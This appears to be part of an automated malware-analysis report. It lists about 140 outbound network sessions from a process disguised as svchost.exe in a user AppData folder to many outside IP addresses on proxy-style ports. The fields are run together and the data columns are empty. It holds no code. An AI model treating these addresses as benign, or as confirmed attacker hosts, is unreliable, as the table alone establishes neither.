                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    3978192.168.2.56259293.190.142.573124356176C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    3979192.168.2.562594178.54.21.203808156176C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    3980192.168.2.561674164.92.86.1136298756176C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    3981192.168.2.56172862.171.169.375840256176C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    3982192.168.2.561734202.137.141.212567856176C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    3983192.168.2.561703195.138.73.544401756176C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    3984192.168.2.56254336.134.91.82888856176C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    3985192.168.2.562324107.181.168.145414556176C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    3986192.168.2.561750203.202.253.108502056176C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    3987192.168.2.561884104.236.0.1292216756176C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    3988192.168.2.56177451.15.133.2141637956176C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    3989192.168.2.561846159.223.71.715161656176C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    3990192.168.2.56191724.152.40.49808056176C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    3991192.168.2.56186145.117.179.179652256176C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    3992192.168.2.561943172.93.111.874352056176C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    3993192.168.2.562475184.170.248.5414556176C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    3994192.168.2.561984167.86.69.1424221456176C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    3995192.168.2.56244079.110.196.145808156176C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    3996192.168.2.561911119.3.215.41888856176C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    3997192.168.2.562379117.160.250.1348056176C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    3998192.168.2.56205637.32.98.1603844056176C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    3999192.168.2.562003177.234.244.1743221356176C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    4000192.168.2.5624445.180.19.163108056176C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    4001192.168.2.561551203.96.177.2113338256176C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    4002192.168.2.56211274.208.12.353733956176C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    4003192.168.2.561827117.160.250.1638256176C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    4004192.168.2.562541189.240.60.169909056176C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    4005192.168.2.56210431.148.207.1538056176C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    4006192.168.2.562490128.199.221.915022356176C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    4007192.168.2.56257145.61.188.1344449956176C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    4008192.168.2.562559181.78.19.24799956176C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    4009192.168.2.56232386.8.163.88915056176C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    4010192.168.2.562545195.248.243.149723743312C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    4011192.168.2.562544136.244.99.51888843312C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    4012192.168.2.55999072.167.221.1576474243312C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    4013192.168.2.562211111.53.178.249730243312C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    4014192.168.2.55992950.63.12.1013242343312C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    4015192.168.2.561527190.97.238.9499956176C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    4016192.168.2.561566162.214.170.1443759256176C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    4017192.168.2.56235072.206.181.976494343312C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    4018192.168.2.56016345.11.95.165601443312C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    4019192.168.2.561297142.54.226.214414543312C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    4020192.168.2.560370103.148.192.83808943312C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    4021192.168.2.560353203.96.177.2111590143312C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    4022192.168.2.56041691.134.140.1604904243312C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    4023192.168.2.56047862.33.207.2028043312C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    4024192.168.2.56046851.161.131.845861243312C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    4025192.168.2.56050047.93.113.251312943312C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    4026192.168.2.560599164.92.237.1886337343312C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    4027192.168.2.560690104.200.135.46414543312C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    4028192.168.2.560540195.114.209.508043312C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    4029192.168.2.560551148.66.130.531534543312C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    4030192.168.2.56258541.65.224.91198156176C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    4031192.168.2.562602119.196.168.1838056176C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    4032192.168.2.56260545.120.178.197108056176C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    4033192.168.2.5626048.219.177.1341567356176C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    4034192.168.2.562513120.197.40.219900256176C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    4035192.168.2.56260634.95.243.122808156176C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    4036192.168.2.562603103.127.1.1308056176C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    4037192.168.2.562624218.145.131.18244356176C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    4038192.168.2.56246872.195.114.169414556176C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    4039192.168.2.56213352.151.210.204900056176C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    4040192.168.2.560011149.28.141.1806520156176C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    4041192.168.2.562173185.104.63.54312856176C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    4042192.168.2.562680218.145.131.18244356176C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    4043192.168.2.562607184.170.245.148414556176C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    4044192.168.2.562143178.33.163.1564238056176C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    4045192.168.2.56260890.188.250.168056176C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    4046192.168.2.562645104.24.35.1528056176C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    4047192.168.2.562660185.162.228.1708056176C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    4048192.168.2.562684218.145.131.18244356176C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    4049192.168.2.562686218.145.131.18244356176C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    4050192.168.2.55529851.222.241.83621943312C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    4051192.168.2.562183184.178.172.14414556176C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    4052192.168.2.562612154.12.178.1072998556176C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    4053192.168.2.56264294.131.60.2065837856176C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    4054192.168.2.562616136.244.99.51888843312C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    4055192.168.2.560658166.62.85.1842194643312C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    4056192.168.2.56264054.178.159.1991808056176C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    4057192.168.2.56223147.90.126.78811856176C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    4058192.168.2.56261745.11.95.165601443312C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    4059192.168.2.562676107.181.168.145414556176C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    4060192.168.2.562610193.151.130.114808643312C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    4061192.168.2.562658134.209.29.120312856176C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    4062192.168.2.562672162.243.102.207976456176C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    4063192.168.2.56067536.64.22.18819943312C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    4064192.168.2.56227882.113.157.1223128056176C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    4065192.168.2.562641154.85.125.235644656176C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    4066192.168.2.56266960.246.122.2448056176C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    4067192.168.2.56267746.17.63.1661637956176C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    4068192.168.2.56266652.67.10.1838056176C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    4069192.168.2.562668138.36.199.14415356176C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    4070192.168.2.56267047.243.205.1312856176C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    4071192.168.2.56267843.131.242.1621567356176C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    4072192.168.2.56222978.133.163.190414556176C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    4073192.168.2.562673178.54.21.203808156176C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    4074192.168.2.56078191.148.127.162808043312C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    4075192.168.2.562667125.94.219.96909156176C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    4076192.168.2.555523192.169.226.965057843312C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    4077192.168.2.56264294.131.60.2065837843312C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    4078192.168.2.56267149.228.131.169500056176C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    4079192.168.2.562692181.78.19.24899956176C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    4080192.168.2.56078494.131.106.208312843312C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    4081192.168.2.562685195.90.216.75108056176C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    4082192.168.2.561863103.97.179.115108043312C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    4083192.168.2.562327162.241.207.2178056176C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    4084192.168.2.562664122.114.232.13780856176C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    4085192.168.2.555466165.227.104.1225883943312C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    4086192.168.2.560759103.132.92.110108043312C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    4087192.168.2.56269131.148.207.1538056176C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    4088192.168.2.56269952.151.210.204900056176C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    4089192.168.2.55557392.205.110.118789543312C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    4090192.168.2.5627311.0.0.138056176C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    4091192.168.2.562704184.170.245.148414556176C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    4092192.168.2.562735104.25.42.1788056176C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    4093192.168.2.55548962.103.66.18312843312C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    4094192.168.2.562736162.240.72.1393744556176C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    4095192.168.2.56281191.231.186.13344356176C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    4096192.168.2.56281291.231.186.13344356176C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    4097192.168.2.562733165.227.196.375371856176C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    4098192.168.2.56281391.231.186.13344356176C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    4099192.168.2.56281691.231.186.13344356176C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    4100192.168.2.56270037.18.73.60556656176C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    4101192.168.2.562627117.160.250.1388056176C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    4102192.168.2.562714147.75.34.861001056176C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    4103192.168.2.55554091.134.140.1604896243312C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    4104192.168.2.55553891.134.140.1602089643312C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    4105192.168.2.56272545.120.178.197108056176C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    4106192.168.2.562766162.243.102.207976456176C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    4107192.168.2.562724139.99.148.90312856176C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    4108192.168.2.562779162.241.79.223531856176C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    4109192.168.2.562713103.127.1.1308056176C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    4110192.168.2.562777198.23.176.76312856176C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    4111192.168.2.5627328.219.177.1341567356176C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    4112192.168.2.562744220.248.70.237900256176C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    4113192.168.2.555865187.49.191.1499943312C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    4114192.168.2.56275343.163.192.31567356176C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    4115192.168.2.56277373.151.59.352081656176C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    4116192.168.2.562806104.20.225.2188056176C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    4117192.168.2.56267436.134.91.82888856176C:\Users\user\AppData\Roaming\svchost.exe
